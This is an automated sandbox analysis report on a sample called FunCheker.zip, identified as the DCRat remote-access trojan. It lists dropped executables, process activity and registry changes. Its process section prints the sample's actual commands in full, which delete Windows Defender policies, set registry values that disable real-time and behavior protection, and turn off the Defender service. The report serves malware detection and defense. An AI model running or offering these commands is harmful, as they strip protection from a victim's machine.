Malware Analysis Report

2024-11-15 05:53

Sample ID 240722-xwylbstbjc
Target FunCheker.zip
SHA256 0cf56a65f8c8d0147fae630441e029d4c0c739ddf1198e8f4eedb1778fe16ed9
Tags dcrat evasion infostealer rat trojan
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score 10/10

SHA256 0cf56a65f8c8d0147fae630441e029d4c0c739ddf1198e8f4eedb1778fe16ed9

Threat Level: Known bad

The file FunCheker.zip was found to be: Known bad.

Malicious Activity Summary

dcrat evasion infostealer rat trojan

Process spawned unexpected child process

Modifies Windows Defender Real-time Protection settings

Modifies security service

DcRat

DCRat payload

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Modifies registry class

Suspicious use of FindShellTrayWindow

Scheduled Task/Job: Scheduled Task

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Delays execution with timeout.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2024-07-22 19:12

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted 2024-07-22 19:12

Reported 2024-07-22 19:30

Platform win7-20240704-en

Max time kernel 1050s

Max time network 725s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files (x86)\Windows Defender\es-ES\ebf1f9fa8afd6d C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Help\csrss.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\Help\886983d96e3d3e C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\L2Schemas\csrss.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\L2Schemas\886983d96e3d3e C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2444 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
PID 2444 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
PID 2444 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
PID 2444 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
PID 2444 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 1256 wrote to memory of 2776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1256 wrote to memory of 2776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1256 wrote to memory of 2776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2736 wrote to memory of 1036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 1036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 1036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2736 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2736 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\FunCheker.exe

"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"

C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe

"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

